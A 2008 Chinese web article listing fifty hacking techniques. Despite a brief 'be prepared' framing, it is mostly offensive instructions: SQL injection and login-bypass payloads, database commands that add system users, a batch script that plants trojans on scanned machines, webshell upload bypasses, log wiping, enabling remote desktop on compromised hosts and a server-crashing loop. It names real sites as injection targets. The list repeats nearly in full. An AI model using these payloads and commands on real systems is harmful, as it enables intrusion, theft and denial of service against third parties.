黑客入侵網(wǎng)絡(luò)的五十種方法
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 21:29:41 作者:佚名
我要評論

現(xiàn)在網(wǎng)上的攻擊事件越來越多,黑客都是通過什么方法來攻擊我們的呢?下面我們給大家總結(jié)了黑客入侵網(wǎng)絡(luò)的五十種方法,讓大家做到有備無患。
1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò)
2.搜索欄里輸入
關(guān)鍵字%'and 1=1 and '%'='
現(xiàn)在網(wǎng)上的攻擊事件越來越多,黑客都是通過什么方法來攻擊我們的呢?下面我們給大家總結(jié)了黑客入侵網(wǎng)絡(luò)的五十種方法,讓大家做到有備無患。
1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò) 2.搜索欄里輸入 關(guān)鍵字%'and 1=1 and '%'=' 關(guān)鍵字%'and 1=2 and '%'=' 比較不同處 可以作為注入的特征字符 3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現(xiàn)在很是遍地都是 4.我們先到www.google.com底下搜索一下co net mib ver 1.0 密碼帳號都是 'or'='or' 5.掛馬代碼 6.http://www.wyyfk.com/24小時掛qq工具 7.開啟regedt32的sam的管理員權(quán)限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被入侵過了,然后刪了guest帳號,對方可以用guest帳號使用administraeors的權(quán)限,你也可以用這方法留住肉雞,這方法是簡單克隆, net localgroup administrators還是可以看出guest是管理員來 7.只要敢想,新浪也可入侵 注入點 http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59 微軟官方網(wǎng)站注入點 http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu= 8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.后綴名 可以綁上qq大盜木馬 9.有sa權(quán)限sqlserver數(shù)據(jù)庫、并且能sql注入支持fso asp的服務(wù)器 sql注入后,如何上傳木馬, 文章地址 http://hack123.home4u.china.com/0601.htm 10.qq強制聊天代碼 http://wpa.qq.com/msgrd?v=1&uin=對方的qq號&site=ioshenmue&menu=yes 使用方法:把代碼中的紅色的“********”星號換成你想與其聊天的qq號后復(fù) 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他為好友就能給 他發(fā)qq消息。 11. mybbs論壇cookie欺騙 后臺備份馬 12.軟件instsrv.exe 把.exe文件做成系統(tǒng)服務(wù)來啟動 用來肉雞掛qq等 用法: 安裝: instsrv.exe 服務(wù)名稱 路徑 卸載: instsrv.exe 服務(wù)名稱 remove 13.以動網(wǎng)為例數(shù)據(jù)庫查找dv_log,在上面的查詢的字段名里選l_content后面的關(guān)鍵字填上password2,找到的username2=風(fēng)の白衣&password2=01180017&username1=風(fēng)の白衣&submit=添 加 password2=01180017就是他的登陸密碼 14.搜索的技巧 inurl:網(wǎng)址 15.啟航工作室wms 5.0網(wǎng)站程序漏洞 在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1) 利用動畫看http://soft.77169.com/62/20050530/6824.html 16.很多網(wǎng)站程序(比如華碩中文官方網(wǎng)站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那么我們要是把文件改成:ating.jpg.asp試試。。由于還是asp結(jié)尾,所以木馬不會變~ 17.天意商務(wù)系統(tǒng)網(wǎng)上依然有 有漏洞 網(wǎng)站具體的樣式http://www.wzgcc.org/ 工具下載www.hack6.com 地址欄里,填上天意商務(wù)系統(tǒng)的網(wǎng)址就可以了,注意一定要是主頁面 18.sql注入時工具---internet選項---高級里找到顯示友好的錯誤信息勾去掉 不能注入時要第一時間想到\暴庫 19.這個dbinbd.asp文件插入后門的功能適用于文件名為.asp的所有access數(shù)據(jù)庫不是動網(wǎng)論壇也一樣可以使用的,后門隱蔽,幾乎發(fā)現(xiàn)不了 工具使用方法動畫和所有文件 http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811 20.缺少xp_cmdshell時 嘗試恢復(fù)exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' 假如恢復(fù)不成功,可以嘗試直接加用戶(針對開3389的) declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理員
21.批量種植木馬.bat for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 復(fù)制木馬到掃描的計算機當(dāng)中 for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行木馬的時間 掃描地址.txt里每個主機名一行 用\\開頭 22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址www.hack6.com 23.dv7.1用還原數(shù)據(jù)功能 還原asa木馬 24.凡人網(wǎng)絡(luò)購物系統(tǒng)v6.0 可以\暴庫 25.ipb2.0.2漏洞 構(gòu)造語句 $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基里找 ipb<= 2.0.3論壇注入工具 www.hack6.com有下載 26. 將工具傳到郵箱 在下載上右擊 復(fù)制快捷方式 擁有自己了的下載空間 27.北京沖qb要寬帶號跟綁定寬帶的后4位電話,當(dāng)你掃出北京款待號的密碼必須是8位的密碼,而且開頭是6或8的才可以,因為北京的電話都是6根8開頭的而且都是8位的,北京的區(qū)名海淀 東城 西城 門頭溝 豐臺 潮陽 宣武 通州 昌平,去http://cnc.qq.com/bbn/沖 28.搜索 企業(yè)網(wǎng)絡(luò)辦公系統(tǒng) 添'or''=' 登陸 在個人郵箱 上傳asp木馬 29.本人原創(chuàng) 搜索"一點點星空驛站 留言本" 默認數(shù)據(jù)庫是gbmdb.mdb 很多網(wǎng)站用這個留言本 但是用搜索引擎搜不到 可以給大家在入寢時多個思路 30.在程序上傳shell過程中,程序不允許包含標記符號的內(nèi)容的文件上傳,比如藍屏最小 的asp木馬,我們來把他的標簽換一下: 保存為.asp,程序照樣 執(zhí)行. 31.目錄權(quán)限設(shè)置變態(tài)的話可以用一些方法(比如serv-u溢出)將此web用戶提權(quán) 可訪問全站目錄掛馬 32.喜歡網(wǎng)頁掛馬的看看這篇總結(jié)文章吧 http://77169.com/news/hk/2005060611656.html 33.搜索"images/admin" 或".tw/images/admin" 可以找到些臺灣的數(shù)據(jù)庫 34.iis6 for windows 2003 enterprise edition 如iis發(fā)布目錄文件夾包含.asp后輟名. 將.asp后輟改為.jpg或其它的如.htm,也可以運行asp,但要在.asp文件夾下. .cer 等后綴的文件夾下都可以運行任何后綴的asp木馬 35.telnet一臺交換機 然后在telnet控制主機 控制主機留下的是交換機的ip 然后用#clear logg和#clear line vty *刪除日志 36.搜索關(guān)鍵字:"copyright 2003-2004 動易網(wǎng)絡(luò)" 后面地址改成upfile_soft.asp 這樣的漏洞很多 37.bbsxp的漏洞總結(jié) powered by bbsxp 5.15/licence blog.asp中的對id 的過濾不嚴的漏洞 拿到管理員的前后臺密碼 工具:bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這里用 asa 來傳馬 38.學(xué)會總結(jié)入侵思路http://www.77169.com/news/hk/2005060811688.html 39.電腦壞了省去重新安裝系統(tǒng)的方法 純dos下執(zhí)行, xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config 2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config 40.一般人設(shè)置啊拉qq大盜的時候發(fā)信和收信都是同一個信箱,因此當(dāng)我的機子中了此木馬后沒有立即殺掉進程,而是用內(nèi)存編輯工具打開它的進程,查找smtp字樣,就會找到它的信箱和密碼了。只對1.5以前的管用. 41.內(nèi)網(wǎng)控制內(nèi)網(wǎng) 用vidc 還要有一只肉雞 動畫看黑基的 http://soft.77169.com/62/20050608/6878.html 42.有許多管理員用備份的日期做備份數(shù)據(jù)庫的名字 比如http://www.hack6.com/bbs/databackup/20050601.mdb 43.動網(wǎng)數(shù)據(jù)庫oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&submit=更 新 不知道用戶名(不是葛防) 轉(zhuǎn)化這個用他本身的頁面 http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=填寫登錄信息 填寫登錄信息這句話意思是“填寫登錄信息” 那么就把填寫登錄信息換成叼防 可以看到用戶名 44.對付信息監(jiān)控系統(tǒng) 木馬必須是加密的 如net user用不了就用net1 user等等 我是大連的 大連這邊主機用這方法好用 可以直接傳加密的馬 用用黑基tyrant的方法 上傳一個cmd的aspshall 用nc連接自己的nc監(jiān)聽端口 在web目錄下寫個加ftp用戶的txt 本地43958用nc提交 ftp到服務(wù)器加用戶
45.解決tcp/ip篩選 在注冊表里有三處,分別是: hkey_local_machine\system\controlset001\services\tcpip hkey_local_machine\system\controlset002\services\tcpip hkey_local_machine\system\currentcontrolset\services\tcpip 分別用 regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip 命令來導(dǎo)出注冊表項 然后把三個文件里的enablesecurityfilters"=dword:00000001, 改成enablesecurityfilters"=dword:00000000 再將以上三個文件分別用 regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 導(dǎo)入注冊表即可 46.使chm木馬無法在本地運行木馬程序 將注冊表"hkey_current_u ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004項的值由原來十進制的0改為十六進制的3。 47.開3389的5種方法 (1)打開記事本,編輯內(nèi)容如下: echo [components] > c:\sql echo tsenable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 編輯好后存為bat文件,上傳至肉雞,執(zhí)行。 (2) (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05 下載地址:www.netsill.com/rots.zip 在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調(diào)用腳本,例如: c:\>cscript rots.vbs <目標ip> <用戶名> <密碼> [服務(wù)端口] [/r] 如果要對本地使用,ip地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用 ""表示)。 (3)djshao正式版5.0 解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyx*.**e上傳到肉雞的c:\winnt\temp下,然后 進入c:\winnt\temp目錄執(zhí)行djxyx*.**e解壓縮文件,然后再執(zhí)行解壓縮出來的azzd.exe文件,等一會肉雞 會自動重啟!重啟后會出現(xiàn)終端服務(wù) (4)下載dameware nt utilities 3.66.0.0 注冊版 地址www.netsill.com/dwmrcw36600.zip 安裝注冊完畢后輸入對方ip用戶名密碼,等待出現(xiàn)是否安裝的對話框點是。 復(fù)制啟動后出現(xiàn)對方桌面。 在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows組件,找到終端服務(wù),點際進入 后在啟動終端服務(wù)上打上勾。確定自動提示重起,重起后ok (5)大家最常用的 3389.exe 下載地址www.hack6.com 把程序上傳到肉雞運行后重啟既可 48.qq上得到別人的ip 一般跟別人聊天 如果是對方先對你說話 那么她的ip顯示出來的概率就大 當(dāng)然如果是我們找對方 可以先跟她說發(fā)過去消息之后 然后關(guān)閉窗口等待她的回復(fù) 還可以用天網(wǎng)防火墻選擇上udp數(shù)據(jù)保檢測,即可攔截到對方ip 49.掛馬js代碼document.write('');保存到j(luò)s頁面里 可讓所有頁面掛馬 50.讓服務(wù)器重啟 寫個bat死循環(huán): @echo off :loop1 cls start cmd.exe goto loop1 保存成bat guset權(quán)限就可以運行 運行后很快服務(wù)器就會死機 管理員自然會去重啟
1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò) 2.搜索欄里輸入 關(guān)鍵字%'and 1=1 and '%'=' 關(guān)鍵字%'and 1=2 and '%'=' 比較不同處 可以作為注入的特征字符 3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現(xiàn)在很是遍地都是 4.我們先到www.google.com底下搜索一下co net mib ver 1.0 密碼帳號都是 'or'='or' 5.掛馬代碼 6.http://www.wyyfk.com/24小時掛qq工具 7.開啟regedt32的sam的管理員權(quán)限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被入侵過了,然后刪了guest帳號,對方可以用guest帳號使用administraeors的權(quán)限,你也可以用這方法留住肉雞,這方法是簡單克隆, net localgroup administrators還是可以看出guest是管理員來 7.只要敢想,新浪也可入侵 注入點 http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59 微軟官方網(wǎng)站注入點 http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu= 8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.后綴名 可以綁上qq大盜木馬 9.有sa權(quán)限sqlserver數(shù)據(jù)庫、并且能sql注入支持fso asp的服務(wù)器 sql注入后,如何上傳木馬, 文章地址 http://hack123.home4u.china.com/0601.htm 10.qq強制聊天代碼 http://wpa.qq.com/msgrd?v=1&uin=對方的qq號&site=ioshenmue&menu=yes 使用方法:把代碼中的紅色的“********”星號換成你想與其聊天的qq號后復(fù) 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他為好友就能給 他發(fā)qq消息。 11. mybbs論壇cookie欺騙 后臺備份馬 12.軟件instsrv.exe 把.exe文件做成系統(tǒng)服務(wù)來啟動 用來肉雞掛qq等 用法: 安裝: instsrv.exe 服務(wù)名稱 路徑 卸載: instsrv.exe 服務(wù)名稱 remove 13.以動網(wǎng)為例數(shù)據(jù)庫查找dv_log,在上面的查詢的字段名里選l_content后面的關(guān)鍵字填上password2,找到的username2=風(fēng)の白衣&password2=01180017&username1=風(fēng)の白衣&submit=添 加 password2=01180017就是他的登陸密碼 14.搜索的技巧 inurl:網(wǎng)址 15.啟航工作室wms 5.0網(wǎng)站程序漏洞 在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1) 利用動畫看http://soft.77169.com/62/20050530/6824.html 16.很多網(wǎng)站程序(比如華碩中文官方網(wǎng)站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那么我們要是把文件改成:ating.jpg.asp試試。。由于還是asp結(jié)尾,所以木馬不會變~ 17.天意商務(wù)系統(tǒng)網(wǎng)上依然有 有漏洞 網(wǎng)站具體的樣式http://www.wzgcc.org/ 工具下載www.hack6.com 地址欄里,填上天意商務(wù)系統(tǒng)的網(wǎng)址就可以了,注意一定要是主頁面 18.sql注入時工具---internet選項---高級里找到顯示友好的錯誤信息勾去掉 不能注入時要第一時間想到\暴庫 19.這個dbinbd.asp文件插入后門的功能適用于文件名為.asp的所有access數(shù)據(jù)庫不是動網(wǎng)論壇也一樣可以使用的,后門隱蔽,幾乎發(fā)現(xiàn)不了 工具使用方法動畫和所有文件 http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811 20.缺少xp_cmdshell時 嘗試恢復(fù)exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' 假如恢復(fù)不成功,可以嘗試直接加用戶(針對開3389的) declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理員
21.批量種植木馬.bat for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 復(fù)制木馬到掃描的計算機當(dāng)中 for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行木馬的時間 掃描地址.txt里每個主機名一行 用\\開頭 22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址www.hack6.com 23.dv7.1用還原數(shù)據(jù)功能 還原asa木馬 24.凡人網(wǎng)絡(luò)購物系統(tǒng)v6.0 可以\暴庫 25.ipb2.0.2漏洞 構(gòu)造語句 $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基里找 ipb<= 2.0.3論壇注入工具 www.hack6.com有下載 26. 將工具傳到郵箱 在下載上右擊 復(fù)制快捷方式 擁有自己了的下載空間 27.北京沖qb要寬帶號跟綁定寬帶的后4位電話,當(dāng)你掃出北京款待號的密碼必須是8位的密碼,而且開頭是6或8的才可以,因為北京的電話都是6根8開頭的而且都是8位的,北京的區(qū)名海淀 東城 西城 門頭溝 豐臺 潮陽 宣武 通州 昌平,去http://cnc.qq.com/bbn/沖 28.搜索 企業(yè)網(wǎng)絡(luò)辦公系統(tǒng) 添'or''=' 登陸 在個人郵箱 上傳asp木馬 29.本人原創(chuàng) 搜索"一點點星空驛站 留言本" 默認數(shù)據(jù)庫是gbmdb.mdb 很多網(wǎng)站用這個留言本 但是用搜索引擎搜不到 可以給大家在入寢時多個思路 30.在程序上傳shell過程中,程序不允許包含標記符號的內(nèi)容的文件上傳,比如藍屏最小 的asp木馬,我們來把他的標簽換一下: 保存為.asp,程序照樣 執(zhí)行. 31.目錄權(quán)限設(shè)置變態(tài)的話可以用一些方法(比如serv-u溢出)將此web用戶提權(quán) 可訪問全站目錄掛馬 32.喜歡網(wǎng)頁掛馬的看看這篇總結(jié)文章吧 http://77169.com/news/hk/2005060611656.html 33.搜索"images/admin" 或".tw/images/admin" 可以找到些臺灣的數(shù)據(jù)庫 34.iis6 for windows 2003 enterprise edition 如iis發(fā)布目錄文件夾包含.asp后輟名. 將.asp后輟改為.jpg或其它的如.htm,也可以運行asp,但要在.asp文件夾下. .cer 等后綴的文件夾下都可以運行任何后綴的asp木馬 35.telnet一臺交換機 然后在telnet控制主機 控制主機留下的是交換機的ip 然后用#clear logg和#clear line vty *刪除日志 36.搜索關(guān)鍵字:"copyright 2003-2004 動易網(wǎng)絡(luò)" 后面地址改成upfile_soft.asp 這樣的漏洞很多 37.bbsxp的漏洞總結(jié) powered by bbsxp 5.15/licence blog.asp中的對id 的過濾不嚴的漏洞 拿到管理員的前后臺密碼 工具:bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這里用 asa 來傳馬 38.學(xué)會總結(jié)入侵思路http://www.77169.com/news/hk/2005060811688.html 39.電腦壞了省去重新安裝系統(tǒng)的方法 純dos下執(zhí)行, xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config 2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config 40.一般人設(shè)置啊拉qq大盜的時候發(fā)信和收信都是同一個信箱,因此當(dāng)我的機子中了此木馬后沒有立即殺掉進程,而是用內(nèi)存編輯工具打開它的進程,查找smtp字樣,就會找到它的信箱和密碼了。只對1.5以前的管用. 41.內(nèi)網(wǎng)控制內(nèi)網(wǎng) 用vidc 還要有一只肉雞 動畫看黑基的 http://soft.77169.com/62/20050608/6878.html 42.有許多管理員用備份的日期做備份數(shù)據(jù)庫的名字 比如http://www.hack6.com/bbs/databackup/20050601.mdb 43.動網(wǎng)數(shù)據(jù)庫oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&submit=更 新 不知道用戶名(不是葛防) 轉(zhuǎn)化這個用他本身的頁面 http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=填寫登錄信息 填寫登錄信息這句話意思是“填寫登錄信息” 那么就把填寫登錄信息換成叼防 可以看到用戶名 44.對付信息監(jiān)控系統(tǒng) 木馬必須是加密的 如net user用不了就用net1 user等等 我是大連的 大連這邊主機用這方法好用 可以直接傳加密的馬 用用黑基tyrant的方法 上傳一個cmd的aspshall 用nc連接自己的nc監(jiān)聽端口 在web目錄下寫個加ftp用戶的txt 本地43958用nc提交 ftp到服務(wù)器加用戶
45.解決tcp/ip篩選 在注冊表里有三處,分別是: hkey_local_machine\system\controlset001\services\tcpip hkey_local_machine\system\controlset002\services\tcpip hkey_local_machine\system\currentcontrolset\services\tcpip 分別用 regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip 命令來導(dǎo)出注冊表項 然后把三個文件里的enablesecurityfilters"=dword:00000001, 改成enablesecurityfilters"=dword:00000000 再將以上三個文件分別用 regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 導(dǎo)入注冊表即可 46.使chm木馬無法在本地運行木馬程序 將注冊表"hkey_current_u ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004項的值由原來十進制的0改為十六進制的3。 47.開3389的5種方法 (1)打開記事本,編輯內(nèi)容如下: echo [components] > c:\sql echo tsenable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 編輯好后存為bat文件,上傳至肉雞,執(zhí)行。 (2) (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05 下載地址:www.netsill.com/rots.zip 在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調(diào)用腳本,例如: c:\>cscript rots.vbs <目標ip> <用戶名> <密碼> [服務(wù)端口] [/r] 如果要對本地使用,ip地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用 ""表示)。 (3)djshao正式版5.0 解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyx*.**e上傳到肉雞的c:\winnt\temp下,然后 進入c:\winnt\temp目錄執(zhí)行djxyx*.**e解壓縮文件,然后再執(zhí)行解壓縮出來的azzd.exe文件,等一會肉雞 會自動重啟!重啟后會出現(xiàn)終端服務(wù) (4)下載dameware nt utilities 3.66.0.0 注冊版 地址www.netsill.com/dwmrcw36600.zip 安裝注冊完畢后輸入對方ip用戶名密碼,等待出現(xiàn)是否安裝的對話框點是。 復(fù)制啟動后出現(xiàn)對方桌面。 在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows組件,找到終端服務(wù),點際進入 后在啟動終端服務(wù)上打上勾。確定自動提示重起,重起后ok (5)大家最常用的 3389.exe 下載地址www.hack6.com 把程序上傳到肉雞運行后重啟既可 48.qq上得到別人的ip 一般跟別人聊天 如果是對方先對你說話 那么她的ip顯示出來的概率就大 當(dāng)然如果是我們找對方 可以先跟她說發(fā)過去消息之后 然后關(guān)閉窗口等待她的回復(fù) 還可以用天網(wǎng)防火墻選擇上udp數(shù)據(jù)保檢測,即可攔截到對方ip 49.掛馬js代碼document.write('');保存到j(luò)s頁面里 可讓所有頁面掛馬 50.讓服務(wù)器重啟 寫個bat死循環(huán): @echo off :loop1 cls start cmd.exe goto loop1 保存成bat guset權(quán)限就可以運行 運行后很快服務(wù)器就會死機 管理員自然會去重啟
相關(guān)文章
封UDP的服務(wù)器真的打不了么?封UDP、封海外服務(wù)器
很多游戲服務(wù)器租用的時候會出現(xiàn)一些封UDP的字眼,網(wǎng)上一些文章也說UDP協(xié)議不可靠!為什么要封UDP呢?既然不可靠,為什么有些人還要使用它呢?今天與你們分享一下UDP,希望2024-05-07魔獸世界服務(wù)器被DDoS攻擊怎么辦?DDoS攻擊防御方法
魔獸世界服務(wù)器被攻擊在目前來說也是比較常見的,同行競爭激烈,在官服開放時也遇到過DDOS攻擊,要是飛飛沒記錯是在22年9月14日,從剛開始的身份驗證服務(wù)器出現(xiàn)問題,到確2023-07-17分享五大免費企業(yè)網(wǎng)絡(luò)入侵檢測(IDS)工具
這篇文章主要分享一下五大免費企業(yè)網(wǎng)絡(luò)入侵檢測(IDS)工具,當(dāng)前企業(yè)對于網(wǎng)絡(luò)安全越來越重視,那么后期可能就需要大家多多關(guān)注一些安全工具的使用于檢測2019-12-01網(wǎng)絡(luò)安全基礎(chǔ)之網(wǎng)絡(luò)協(xié)議與安全威脅的關(guān)系介紹
網(wǎng)絡(luò)協(xié)議是什么呢?網(wǎng)絡(luò)協(xié)議是網(wǎng)絡(luò)中計算機或設(shè)備之間進行通信的一系列規(guī)則集合。本文中小編介紹的是網(wǎng)絡(luò)協(xié)議和安全威脅的關(guān)系,需要的朋友不妨閱讀本文了解一下2019-04-02- DDoS攻擊是由DoS攻擊轉(zhuǎn)化的,這項攻擊的原理以及表現(xiàn)形式是怎樣的呢?要如何的進行防御呢?本文中將會有詳細的介紹,需要的朋友不妨閱讀本文進行參考2019-01-15
基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備介紹
本文中介紹的是基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備,感興趣的朋友不妨閱讀本文進行了解2019-01-11為何黑客要挾制路由器DNS 用戶該怎樣實時發(fā)覺和防備方法
起首說說挾制路由器是什么意思,路由器挾制平日指的是,開啟了無線網(wǎng)絡(luò)功效的無線路由器,攻擊者經(jīng)由過程破解無線暗碼銜接上無線網(wǎng)后,再登錄路由治理界面來節(jié)制全部無線網(wǎng)2018-05-16大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)
這篇文章主要介紹了大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)置方法詳解,,小編覺得還是挺不錯的,具有一定借鑒價值,下面就來和小編一起看看2018-01-25詳細介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密
這篇文章主要介紹了詳細介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密,如何保護sd卡文件的安全,如何給SD卡設(shè)置密碼、如何給SD卡加密,下面就跟小編一起來看看吧2018-01-19server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法
這篇文章主要介紹了server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法詳細介紹,保護服務(wù)器共享文件設(shè)置訪問權(quán)限,讓每個部門只訪問自己的共享文件等,2018-01-19